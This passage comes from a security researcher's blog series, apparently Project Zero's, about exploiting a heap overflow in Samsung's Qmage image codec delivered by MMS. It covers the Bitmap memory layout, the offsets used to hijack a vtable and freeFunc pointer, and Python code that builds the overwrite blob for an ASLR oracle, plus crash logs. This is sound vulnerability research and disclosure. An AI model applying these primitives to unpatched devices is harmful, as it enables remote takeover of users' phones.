[10036] malloc(160) => 0x7b8cd569e0
    0x7cbddd35c4!operator new+0x24
    0x7cbe67e608
[10036] malloc(24) => 0x7b8ca92580
    0x7cbb87baf4!QuramQmageGrayIndexRleDecode+0x58
    0x7cbe67e608
[10036] calloc(1, 4120) => 0x7bc202c000
    0x7cbb89fb14!init_process_run_dec+0x20
    0x7cbb87bb34!QuramQmageGrayIndexRleDecode+0x98
    0x7cbb8629d4!PVcodecDecoderIndex+0x10c
    0x7cbb862850!__QM_WCodec_decode+0xe0
    0x7cbb862540!Qmage_WDecodeFrame_Low+0x194
    0x7cbb85e600!QuramQmageDecodeFrame+0x74
[...]
Here, we can again see the familiar highlighted allocations before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:
sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {
    void* addr = calloc(size, 1);
    if (!addr) {
        return nullptr;
    }
    return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));
}
As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:

If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:
[15699] calloc(160, 1) => 0x7b88feb8c0
    0x7cbba83684!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8!0x187ae8
    0x7cbd81fc8c!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[15699] malloc(160) => 0x7b88feb960
    0x7cbddd35c4!operator new+0x24
    0x7cbe582608
The difference between 0x7b88feb8c0 and 0x7b88feb960 is 160 (0xA0), exactly the size of the first chunk, which means that we should be able to precisely overwrite the succeeding android::Bitmap object. This behavior is not 100% reliable and is hugely dependent on the preexisting heap state of the attacked app, but I found that it was reliable enough to enable successful, practical attacks. I will expand more on this in the next blog post in the series.
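As a quick sanity check of the arithmetic, the following Python sketch enumerates bitmap dimensions whose pixel buffer lands in the 129 to 160 byte range quoted above, and confirms the gap between the two logged addresses. It assumes 4 bytes per pixel, as reported for the sample earlier in the post; the function name and the `max_side` bound are illustrative only.

```python
BYTES_PER_PIXEL = 4          # assumption: same pixel format as the sample above
BIN_MIN, BIN_MAX = 129, 160  # size range quoted above for the relevant jemalloc bin


def dimensions_for_bin(max_side=16):
    """List (width, height) pairs whose pixel buffer size falls into the bin."""
    return [
        (w, h)
        for w in range(1, max_side + 1)
        for h in range(1, max_side + 1)
        if BIN_MIN <= w * h * BYTES_PER_PIXEL <= BIN_MAX
    ]


pairs = dimensions_for_bin()

# Addresses taken from the Frida log above.
pixel_buffer, bitmap_object = 0x7B88FEB8C0, 0x7B88FEB960
gap = bitmap_object - pixel_buffer
print((10, 4) in pairs, gap)
```

Any pair in `pairs` should place the pixel buffer in the same bin as the 160-byte Bitmap object, although adjacency itself still depends on the heap state, as noted above.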
It's finally time to look at the android::Bitmap layout in memory. Currently, the class is defined in frameworks/base/libs/hwui/hwui/Bitmap.h in the Android source tree. Some of its private fields are visible there, but their volume surely doesn't sum up to 160 bytes. This is because the code makes heavy use of C++ inheritance, so android::Bitmap inherits from SkPixelRef → SkRefCnt → SkRefCntBase. After untangling the above chain of classes and figuring out the alignment requirements for each field, I arrived at the following layout:
struct android::Bitmap {
  /* +0x00 */ void *vtable;

  //
  // class SK_API SkRefCntBase
  //
  /* +0x08 */ mutable std::atomic<int32_t> fRefCnt;

  //
  // class SK_API SkPixelRef : public SkRefCnt
  //
  /* +0x0C */ int     fWidth;
  /* +0x10 */ int     fHeight;
  /* +0x18 */ void*   fPixels;
  /* +0x20 */ size_t  fRowBytes;

  /* +0x28 */ mutable std::atomic<uint32_t> fTaggedGenID;

  struct /* SkIDChangeListener::List */ {
    /* +0x30 */ std::atomic<int> fCount;
    /* +0x34 */ SkOnce           fOSSemaphoreOnce;
    /* +0x38 */ OSSemaphore*     fOSSemaphore;
  } fGenIDChangeListeners;

  struct /* SkTDArray<SkIDChangeListener*> */ {
    /* +0x40 */ SkIDChangeListener* fArray;
    /* +0x48 */ int                 fReserve;
    /* +0x4C */ int                 fCount;
  } fListeners;

  /* +0x50 */ std::atomic<bool> fAddedToCache;

  /* +0x51 */ enum Mutability {
  /* +0x51 */   kMutable,
  /* +0x51 */   kTemporarilyImmutable,
  /* +0x51 */   kImmutable,
  /* +0x51 */ } fMutability : 8;

  //
  // class ANDROID_API Bitmap : public SkPixelRef
  //
  struct /* SkImageInfo */ {
    /* +0x58 */ sk_sp<SkColorSpace> fColorSpace;
    /* +0x60 */ int fWidth;
    /* +0x64 */ int fHeight;
    /* +0x68 */ SkColorType fColorType;
    /* +0x6C */ SkAlphaType fAlphaType;
  } mInfo;

  /* +0x70 */ const PixelStorageType mPixelStorageType;
  /* +0x74 */ BitmapPalette mPalette;
  /* +0x78 */ uint32_t mPaletteGenerationId;
  /* +0x7C */ bool mHasHardwareMipMap;

  union {
    struct {
      /* +0x80 */ void* address;
      /* +0x88 */ void* context;
      /* +0x90 */ FreeFunc freeFunc;
    } external;

    struct {
      /* +0x80 */ void* address;
      /* +0x88 */ int fd;
      /* +0x90 */ size_t size;
    } ashmem;

    struct {
      /* +0x80 */ void* address;
      /* +0x88 */ size_t size;
    } heap;

    struct {
      /* +0x80 */ GraphicBuffer* buffer;
    } hardware;
  } mPixelStorage;

  /* +0x98 */ sk_sp<SkImage> mImage;
};
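The offsets above can be cross-checked by mirroring the layout with Python's ctypes and letting it apply natural alignment. This is only a sketch under stated assumptions: it must run on a 64-bit host, every enum is modeled as a 4-byte int, SkOnce is modeled as a single byte, and smart pointers are modeled as raw pointers. None of these type choices come from the Android sources; they are picked so that the padding rules can be exercised.

```python
import ctypes as C


class ListenerList(C.Structure):      # SkIDChangeListener::List
    _fields_ = [("fCount", C.c_int),
                ("fOSSemaphoreOnce", C.c_uint8),  # assumption: 1-byte SkOnce state
                ("fOSSemaphore", C.c_void_p)]


class TDArray(C.Structure):           # SkTDArray<SkIDChangeListener*>
    _fields_ = [("fArray", C.c_void_p), ("fReserve", C.c_int), ("fCount", C.c_int)]


class ImageInfo(C.Structure):         # SkImageInfo
    _fields_ = [("fColorSpace", C.c_void_p), ("fWidth", C.c_int), ("fHeight", C.c_int),
                ("fColorType", C.c_int), ("fAlphaType", C.c_int)]


class External(C.Structure):
    _fields_ = [("address", C.c_void_p), ("context", C.c_void_p),
                ("freeFunc", C.c_void_p)]


class Ashmem(C.Structure):
    _fields_ = [("address", C.c_void_p), ("fd", C.c_int), ("size", C.c_size_t)]


class Heap(C.Structure):
    _fields_ = [("address", C.c_void_p), ("size", C.c_size_t)]


class PixelStorage(C.Union):
    _fields_ = [("external", External), ("ashmem", Ashmem),
                ("heap", Heap), ("hardware", C.c_void_p)]


class Bitmap(C.Structure):
    _fields_ = [
        ("vtable", C.c_void_p),
        ("fRefCnt", C.c_int32),
        ("fWidth", C.c_int),
        ("fHeight", C.c_int),
        ("fPixels", C.c_void_p),
        ("fRowBytes", C.c_size_t),
        ("fTaggedGenID", C.c_uint32),
        ("fGenIDChangeListeners", ListenerList),
        ("fListeners", TDArray),
        ("fAddedToCache", C.c_bool),
        ("fMutability", C.c_uint8),
        ("mInfo", ImageInfo),
        ("mPixelStorageType", C.c_int),
        ("mPalette", C.c_int),
        ("mPaletteGenerationId", C.c_uint32),
        ("mHasHardwareMipMap", C.c_bool),
        ("mPixelStorage", PixelStorage),
        ("mImage", C.c_void_p),
    ]


# Print the total size and a few offsets for comparison with the listing.
print(hex(C.sizeof(Bitmap)))
print(hex(Bitmap.fPixels.offset), hex(Bitmap.mInfo.offset), hex(Bitmap.mPixelStorage.offset))
```

If the model is right, the reported size should match the 160-byte allocation seen in the Frida log.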
We can immediately spot a number of interesting fields such as the vtable, pointer to backing pixel storage, bitmap dimensions, a raw function pointer (freeFunc), and pointers to other C++ objects such as SkColorSpace, GraphicBuffer and SkImage. The class clearly has the potential to supply many useful exploitation primitives. Let's go ahead and test some initial ideas to see how the code behaves in contact with a corrupted Bitmap object.
Building code execution primitives
In order to start experimenting with the heap corruption, we have to construct a test case that will be easy to adjust for different tests. For building editable binary files for testing file format parsers, I usually use nasm. It allows me to write code-like .asm source files that specify the values of respective header fields with the db/dw/dd/… pseudo-instructions, may include comments, and can be quickly "compiled" to raw binary form. This is what I also used here to craft the proof-of-concept Qmage file from scratch, based on the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample and on reverse engineering the codec. This is where the debug symbols from old builds, which I dug up earlier in the recon phase (as discussed in Part 1), proved very useful.
The nasm source code of the Qmage file I used for experimentation can be found here. It consists of the following logical parts:
  • File header specifying a QG1.2 format version (equivalent to 2.0, as explained in Part 2) and 4x10 bitmap dimensions.
  • A zlib-compressed color table with all 0x41's.
  • A required \xFF\x00 marker, followed by the 0x06 RLE compression type.
  • A RLE-compressed stream of 161-320 bytes: the first 160 to fill out the pixel buffer, followed by 1-160 bytes depending on what portion of the android::Bitmap object we intend to overwrite.
  • A trailing \xFF\x00 marker.

Notably, the RLE compression used in Qmage is not the simple one we know from BMP files. Based on the structure of the code and some RLE-related symbols (init_process_run, process_run, init_process_run_dec, process_run_dec), we can deduce that it is probably a MELCODE scheme. For our purposes, though, it's not much more complicated. If we intend to take a data blob and wrap it with the RLE structure while actually not reducing its size (similar to how zlib compression level 0 works), it's a matter of adding a simple prefix and suffix. For example, a compressed 8-byte string "ABCDEFGH" takes the following form:
00000000: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48  ........ABCDEFGH
00000010: aa aa                                            ..
The little-endian 0x0000000E value indicates the length of the overall compressed stream, 0x00000008 specifies the number of runs – in this case, length of the decompressed data, then there is the raw data and finally N÷4 bytes 0xAA, each of which signifies four runs, one-byte each. With that out of the way, we can proceed to testing potential code execution primitives.
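The wrapping described above can be expressed as a short Python helper. It is a sketch inferred from the single example in this post rather than from the codec itself: the function name is made up, the length field is assumed to count every byte that follows it (which matches 0x0E for the 14 bytes in the dump), and only input lengths divisible by four are handled.

```python
import struct


def wrap_raw_rle(data: bytes) -> bytes:
    """Wrap data in the non-compressing run encoding described above."""
    if len(data) % 4:
        raise ValueError("this sketch only handles lengths that are multiples of 4")
    body = struct.pack("<I", len(data))     # number of runs == decompressed length
    body += data                            # raw bytes, copied verbatim
    body += b"\xaa" * (len(data) // 4)      # each 0xAA byte encodes four one-byte runs
    # Assumption: the leading length counts everything after the length field.
    return struct.pack("<I", len(body)) + body


stream = wrap_raw_rle(b"ABCDEFGH")
print(stream.hex(" "))
# prints: 0e 00 00 00 08 00 00 00 41 42 43 44 45 46 47 48 aa aa
```

Feeding it 160 filler bytes followed by the bytes intended for the android::Bitmap object would produce the kind of stream listed in the file outline above.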
The first idea is to overwrite the vtable pointer and see if/where the code crashes. Since it's the first field in memory, we only have to write 8 bytes past the end of the pixel buffer. If we set them to AAAAAAAA and send such a file via MMS, we should see the following crash:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151 in tid 24642 (ReferenceQueueD), pid 24624 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 24624, tid: 24642, name: ReferenceQueueD  >>> <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414151
    x0  0000007c2ac85e40  x1  0000007c25ae9724
    x2  0000007cbd81f1b8  x3  0000007c2ad2d9c0
    x4  000000006f2693ac  x5  0000007c25ae96e4
    x6  0000000000000001  x7  0000000000000000
    x8  4141414141414141  x9  0000000000000000
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000000000360168  x13 0000000000004000
    x14 0000000000000004  x15 0000000000000000
    x16 0000007c25ae9710  x17 0000000000000bc3
    x18 0000007bd31ee000  x19 0000007c2ad2d9c0
    x20 0000007c3034ff80  x21 0000000013126208
    x22 0000000013126208  x23 00000000131261a0
    x24 000000006f26bb50  x25 00000000131261e0
    x26 0000007cc0350cb0  x27 0000007c3a3f5000
    x28 0000007c25aea020  x29 0000007c25ae9700
    sp  0000007c25ae96f0  lr  00000000705bdc44
    pc  0000007cbd81f210

backtrace:
      #00 pc 0000000000186210  /system/lib64/ (Bitmap_destruct(android::BitmapWrapper*)+88) (BuildId: 21b5827e07da22480245498fa91e171d)
[...]
There is an access to the controlled 0x4141414141414141 address in Bitmap_destruct. The code accessing the pointer is as follows:
.text:0000000000186210                 LDR             X8, [X8,#0x10]
.text:0000000000186214                 BLR             X8
As expected, we get an arbitrary vtable call. It is a great first primitive to confirm, and it is direct evidence that everything seems to be working according to plan. Of course at this point, we don't know where any code is located (to redirect execution there), or even where our controlled data is situated (to set up our fake vtable). However, let's focus on one thing at a time. What's important is that the vtable call is controlled by the value of the consecutive fRefCnt field, so we may choose to trigger it or not by setting the reference counter to a small or large integer.
The second eye-catching field that can be likely abused to hijack code execution is the freeFunc function pointer in the mPixelStorage union:
    struct {
      /* +0x80 */ void* address;
      /* +0x88 */ void* context;
      /* +0x90 */ FreeFunc freeFunc;
    } external;
We can check where the pointer is used by running a quick search. As it turns out, it is called in the Bitmap::~Bitmap destructor:
        case PixelStorageType::External:
            mPixelStorage.external.freeFunc(mPixelStorage.external.address,
                                            mPixelStorage.external.context);
            break;
If we look at the broader context of the code, the destructor may provide the attacker with an assortment of primitives, depending on the value of the mPixelStorageType enum: arbitrary munmap+close, arbitrary free, and another arbitrary vtable call (through the mPixelStorage.hardware.buffer pointer). However, I find the freeFunc pointer the most useful, especially in a potential one-shot scenario where we try to take over control of the app with a single, specially crafted MMS message. Conveniently, the function also takes two arguments, which we may control – or in fact, must control, because reaching the freeFunc field with a linear overflow is only possible after overwriting both address and context.
The only problem with this technique is that the Bitmap destructor itself is called through the vtable at offset 0, the one that we have to corrupt in order to get to the deeper fields in the class. Therefore, we can only use it in our exploit if we leave the vtable pointer intact after the overflow. This, in turn, requires the knowledge of the base address. At this point in the story, we don't know how we could leak such information yet, but exploitation gadgets like this are worth writing down even if we don't have all the pieces of the puzzle to make use of them yet.
To make sure that we're reading the code right, we should confirm the behavior in practice. We can construct a Qmage sample that overwrites the full 160 bytes of the Bitmap object with a marker 0x41 byte, and then fine-tune a few specific fields for the experiment:
  • vtable set to its original value, in my case 0x7cbbdfc4e0 (0x7cbb632000 base address + 0x7ca4e0 offset)
  • fRefCnt set to 1
  • mPixelStorageType set to 0 (External)
  • mPixelStorage.external.address set to 0xaaaa...aaa.
  • mPixelStorage.external.context set to 0xbbbb...bbb.
  • mPixelStorage.external.freeFunc set to 0xcccc...ccc.

If we send it via MMS, we should see the following crash in logcat:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 13700 (pool-5-thread-1), pid 12954 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12954, tid: 13700, name: pool-5-thread-1  >>> <<<
uid: 10128
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc
    x0  aaaaaaaaaaaaaaaa  x1  bbbbbbbbbbbbbbbb
    x2  0000000000000001  x3  0000000000000000
    x4  0000007c2be315d0  x5  0000007c3910cc64
    x6  0000000000000000  x7  00000000186f2b72
    x8  cccccccccccccccc  x9  0000007cbbdfc4f0
    x10 0000000000000000  x11 0000007c3a3f4000
    x12 0000007c3175b20c  x13 000000005f0cc80f
    x14 003419f64036d144  x15 000051761dd7a34a
    x16 0000007cbd8f3230  x17 0000007cbba98620
    x18 0000007bbc84e000  x19 0000007bc8ff8dc0
    x20 0000000000000000  x21 0000007bc9153540
    x22 000000000000000c  x23 0000000000000000
    x24 0000000000000000  x25 0000000000000002
    x26 0000007c2be32d50  x27 0000000000000059
    x28 0000007cc03fa7c0  x29 0000007c2be319c0
    sp  0000007c2be319b0  lr  0000007cbba69f00
    pc  cccccccccccccccc

backtrace:
      #00 pc cccccccccccccccc  <unknown>
      #01 pc 0000000000437efc  /system/lib64/ (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]
As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).
In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.
Building an ASLR oracle primitive
In most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.
The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting an iPhone iMessage CVE-2019-8641 vulnerability in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.
The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.
The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.
Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 000000000047a760  /system/lib64/ (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)
      #01 pc 000000000018df90  /system/lib64/ (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)
      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)
      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (
      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (
      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (
The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:
Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12550, tid: 12666, name: pool-5-thread-1  >>> <<<
uid: 10128
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant
  at void$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (
  at (
  at (
Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters method. This means that this pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zero'ed memory in the ASLR oracle output.
The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:
$Rgb$TransferParameters.<init>
[...]
We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.
Lifetime of a Bitmap
When we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:
  1. The initial Bitmap is created through a BitmapFactory.decodeStream call in ImageUtil.loadBitmapFromStream.

  2. The bitmap is then subjected to scaling. The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones.

  3. Lastly, in the method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding.

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.
I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes 0x41 again, we should adjust:
  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:
  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the rowBytes checks (1, 2) in SkBitmap::setInfo by setting it to a sensible value:
  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:
  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic. To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:
  • mInfo.fColorType (offset 0x68) → 0x6

Finally, we arrive at the following loop:
    for (int y = 0; y < dstInfo.height(); y++) {
        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());
        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);
        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);
    }
That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:
  • dstInfo.height() == mInfo.fHeight
  • dstInfo.width() == mInfo.fWidth
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:

This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:
  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, in mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary continuous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.
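Putting the field adjustments from this section together, the 160 bytes written over the android::Bitmap object could be assembled as in the Python sketch below. The offsets and values are the ones listed above; the function name and its parameters are hypothetical, and the result is only the overlay, not a complete Qmage file.

```python
import struct

BITMAP_SIZE = 160  # size of the android::Bitmap allocation observed above


def build_oracle_overlay(probe_start: int, pages: int) -> bytes:
    """Return the bytes to place over the Bitmap object for one oracle probe."""
    blob = bytearray(b"\x41" * BITMAP_SIZE)          # start from the 0x41 marker blob
    struct.pack_into("<i", blob, 0x0C, 1)            # fWidth: disables scaling
    struct.pack_into("<i", blob, 0x10, 1)            # fHeight: disables scaling
    struct.pack_into("<Q", blob, 0x18, probe_start)  # fPixels: first probed address
    struct.pack_into("<Q", blob, 0x20, 0x1000)       # fRowBytes: one page per row
    struct.pack_into("<Q", blob, 0x58, 0)            # mInfo.fColorSpace: must be NULL
    struct.pack_into("<i", blob, 0x60, 1)            # mInfo.fWidth: 4 bytes read per row
    struct.pack_into("<i", blob, 0x64, pages)        # mInfo.fHeight: number of pages
    struct.pack_into("<i", blob, 0x68, 6)            # mInfo.fColorType: BGRA_8888
    return bytes(blob)


overlay = build_oracle_overlay(0x7FDFB10000, 10)
print(len(overlay), overlay[0x18:0x20].hex())
```

All other fields, including the vtable pointer and the reference counter, keep the 0x41 filler in this sketch, as in the starting blob described above.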
As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 00000000006fb210  /system/lib64/ (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)
      #01 pc 00000000003b5410  /system/lib64/ (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)
      #02 pc 00000000003b5114  /system/lib64/ (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)
      #03 pc 00000000004f26c0  /system/lib64/ (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)
      #04 pc 0000000000185fb8  /system/lib64/ (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)
      #05 pc 000000000018397c  /system/lib64/ (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)
[...]
A SIGSEGV is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the process is a stack:
7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]
To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:
Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)
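The expected fault address for this experiment can be reproduced with a small Python model of the conversion loop. It is a simplification written for illustration: only the first byte of each four-byte read is checked, all mappings are treated as readable, and the function name is made up.

```python
PAGE = 0x1000


def first_fault(start, rows, row_bytes, mappings):
    """Return the first probed address outside every mapping, or None if all reads succeed."""
    addr = start
    for _ in range(rows):
        if not any(lo <= addr < hi for lo, hi in mappings):
            return addr          # the real process would receive SIGSEGV here
        addr += row_bytes        # srcPixels advances by fRowBytes after each row
    return None


stack = (0x7FDF319000, 0x7FDFB18000)   # [stack] mapping quoted above
fault = first_fault(0x7FDFB10000, 10, PAGE, [stack])
print(hex(fault))
# prints: 0x7fdfb18000
```

With eight rows instead of ten, the model returns None, which corresponds to the app staying alive.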
The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.
Summary
To recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.
The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regards to low-level exploitation capabilities.
With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:
  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.

MMS Exploit Part 2: Effective Fuzzing of the Qmage Codec

23 July, 2020 - 18:32
Posted by Mateusz Jurczyk, Project Zero
This post is the second of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
Introduction
